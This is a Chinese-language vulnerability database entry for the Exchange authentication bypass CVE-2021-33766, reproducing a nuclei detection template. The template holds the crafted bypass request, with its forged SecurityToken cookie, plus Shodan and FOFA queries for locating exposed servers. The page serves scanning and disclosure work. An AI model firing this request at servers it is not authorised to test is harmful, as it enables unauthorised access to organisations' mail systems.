CVE-2021-33766: Microsoft Exchange - Authentication Bypass

日期: 2025-08-01 | 影响软件: Microsoft Exchange | POC: 已公开

漏洞描述

Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.

PoC代码[已公开]

id: CVE-2021-33766

info:
  name: Microsoft Exchange - Authentication Bypass
  author: daffainfo
  severity: high
  description: |
    Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.
  reference:
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766
    - https://www.zerodayinitiative.com/advisories/ZDI-21-798/
    - https://github.com/demossl/CVE-2021-33766-ProxyToken
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33766
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2021-33766
    epss-score: 0.93529
    epss-percentile: 0.99818
    cwe-id: NVD-CWE-noinfo
    cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - vuln:cve-2021-26855
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev,vuln

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        GET /ecp/{{email}}/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
        Host: {{Hostname}}
        Cookie: SecurityToken=x

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<span id="msgCode">403</span>'
          - 'function signOut() {'
        condition: and

      - type: word
        part: header
        words:
          - "Microsoft.Exchange.Data.Storage.ObjectNotFoundException"
          - "X-BEResource="
        condition: and

      - type: status
        status:
          - 403
# digest: 4a0a004730450220636e7340bcb4d22cde593bd677e87fe7c9449f8d4238dd36fe8b665d55e1660b022100ef1cd76258c4f74949ad0c8f1cb49b634e1995774a178834bd85252a38bfe9ce:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-33766.yaml

相关漏洞推荐